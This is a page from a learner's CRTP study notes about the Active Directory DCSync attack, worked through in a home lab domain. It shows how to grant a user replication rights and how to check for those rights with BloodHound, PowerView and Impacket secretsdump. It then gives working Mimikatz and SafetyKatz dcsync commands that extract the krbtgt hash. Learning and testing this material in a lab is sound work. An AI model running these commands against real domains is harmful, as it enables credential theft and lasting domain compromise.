Certified Red Team Professional (CRTP) - Notes
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • 📝Certified Red Team Professional (CRTP) - Notes
    • ℹ️0 - Course Summary
    • 1️⃣1 - Active Directory (AD)
      • 1.1 - Introduction to Active Directory (AD)
      • 1.2 - Physical Components of AD
      • 1.3 - Logical Components of AD
    • 2️⃣2 - PowerShell
      • 2.1 - Introduction to PowerShell
      • 2.2 - Security and Detection
    • 3️⃣3 - AD Enumeration
      • 3.1 - Host & User Identification
      • 3.2 - Common Services Enum
        • 3.2.1 - LDAP & DNS Enum
        • 3.2.2 - SMB Enum & Common Attacks
      • 3.3 - Domain Enumeration
        • 3.3.1 - PowerView
          • 3.3.1.1 - Domain Enumeration (Video Lab)
        • 3.3.2 - BloodHound
    • 4️⃣4 - Trust and Privileges Mapping
      • 4.1 - Access Control (ACL/ACE)
      • 4.2 - Group Policy
      • 4.3 - Trusts
    • 5️⃣5 - Local Privilege Escalation
      • 5.1 - Privilege Escalation
        • 5.1.1 - Feature Abuse
        • 5.1.2 - Relaying
        • 5.1.3 - GPO Abuse
        • 5.1.4 - Unquoted Service Path
      • 5.2 - Tools
    • 7️⃣6 - Lateral Movement
      • 6.1 - PowerShell Remoting & Tradecraft
      • 6.2 - Credentials Extraction & Mimikatz
    • 9️⃣7 - Kerberos Attack and Privelege Escalation
      • 7.1 - Kerberos Intro
      • 7.2 - User Enum in Kerberos
      • 7.3 - AS-REP Roasting
      • 7.4 - Kerberoasting
      • 7.5 - Kerberos Delegation
        • Uncostrained Delegation
        • Constrained Delegation
      • 7.6 - Accross Trusts
        • Page
        • External Trust
        • Forest
        • Domain Trust
    • 8️⃣8 - Persistence
      • 8.1 - Golden Ticket
      • 8.2 - Silver Ticket
      • 8.3 - Diamond Ticket
      • 8.4 - Skeleton Key
      • 8.5 - DSRM
      • 8.6 - Custom SSP
      • 8.7 - Persistence via ACLs
        • 8.7.1 - AdminSDHolder
        • 8.7.2 - DCSync Attack
        • 8.7.3 - Security Descriptors
    • 9️⃣9 - Detection and Defense
    • Lab
      • 0 - Lab Instructions
      • 1 - LO 1️
      • 2 - LO2️
      • 3 - LO 3️
      • 4 - LO 4️
      • 5 - LO 5️
      • 6 - LO 6️
      • 7 - LO 7️
      • 8 - LO8️
      • 9 - LO9️
      • 10 - LO1️0️
      • 11 - LO1️1️
      • 12 - LO1️2️
      • 13 - LO1️3️
      • 14 - LO1️4️
      • 15 - LO1️5️
      • 16 - LO1️6️
      • 17 - LO1️7️
      • 18 - LO1️8️
      • 19 - LO1️9️
      • 20 - LO2️0️
      • 21 - LO2️1️
      • 22 - LO 2️2️
      • 23 - LO2️3️
    • 📄Report
      • How to write a PT Report
  • 🛣️RoadMap / Exam Preparation
  • 📔CRTP Cheat Sheet
Powered by GitBook
On this page
  • DCSynk Attack
  • Configuration of a vulnerable user
  • Check if a machine is vulnerable to DCSync attack
  • Labs
  1. Certified Red Team Professional (CRTP) - Notes
  2. 8 - Persistence
  3. 8.7 - Persistence via ACLs

8.7.2 - DCSync Attack

Previous8.7.1 - AdminSDHolderNext8.7.3 - Security Descriptors

Last updated 2 days ago

DCSynk Attack

DCSynk Attack is a tecnique used in post-exploitation scenarios in order to extract sensitive data from an AD domain by abusing the AD replication feature, which guide how DC synchronize data between themselves.

The DCSync attack trucks a DC into thinking the attacker is another legitimate DC that needs replication data.

The replication data extract with this attack includes:

  • NTLM password hashes (including krbtgt)

  • Kerberos key

  • Password hystory

So, DCSync can be combined with other attacks, such as the Golden Ticket attack, to establish persistance into a domain

Configuration of a vulnerable user

Go into Domain Controller account:

  • Open Active Directory Users and Computers

  • Click on DC: dev-angelist.lab -> Properties -> Security -> Add (devan), Check Names, Ok

Select devan user and mark as allow these three permissions:

  • Replicating Directory Changes

  • Replicating Directory Changes All

  • Replicating Directory Changes In Filtered Set

and confirm.

In alternative is possible to set them using AD module command:

Import-Module .\RACE.ps1

Set-ADACL -SamAccountName devan `
-GUIDRight DCSync `
-DistinguishedName 'DC=dev-angelist,DC=lab' `
-Verbose

Check if a machine is vulnerable to DCSync attack

We can check if all go right using BloodHound:

python3 -m venv venv
. venv/bin/activate
pip3 install bloodhound

bloodhound-python -u administrator -p 'P@$$W0rd' -ns 192.168.57.9 -d dev-angelist.lab -c All --zip
wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz
tar -xvzf bloodhound-cli-linux-amd64.tar.gz
./bloodhound-cli install
./bloodhound-cli containers start
#Access to Bloodhound UI at: http://127.0.0.1:8080/ui/login
#Go to file ingest and upload bloodhound zip file generated
#And check: Dangerous Privileges -> Principals with DCSync privileges

If there're "AllExtendedRights" and "GenericAll" permissions we can perform DCSync Attack.

In alternative, we can use PowerView (if we've access to Devan machine):

Get-ObjectAcl -SamAccountName devan -ResolveGUIDs | ?{$_.ActiveDirectoryRights -match "Replicating"}

or we can check it on attacker machine (linux / kali) using Secretsdump module of Impacket:

secretsdump.py 'devan:new_password123'@192.168.57.9

Mimikatz

Let's assume we've a low privileged access to a workstation joined into the domain, in my case i log into: dev-angelist\devan's account.

Download and extract Mimikatz:

iwr -uri https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mimikatz_trunk.zip
Expand-Archive -Path 'mimikatz_trunk.zip'
cd .\mimikatz_trunk\
#Win32 Folder in this case, because this machine is 32bit

and run it to leak the NTLM hash of krbtgt user:

.\mimikatz.exe
lsadump::dcsync /domain:dev-angelist.lab /user:krbtgt" "exit"

Using Safetykatz

C:\Users\Administrator\Documents\Tools\SafetyKatz.exe "lsadump::dcsync /user:dev-angelist\krbtgt" "exit"

Labs

we can common upload it ang log-in using neo4j or using tool:

📝
8️⃣
bloodhound-cli
Learning Object 12 lab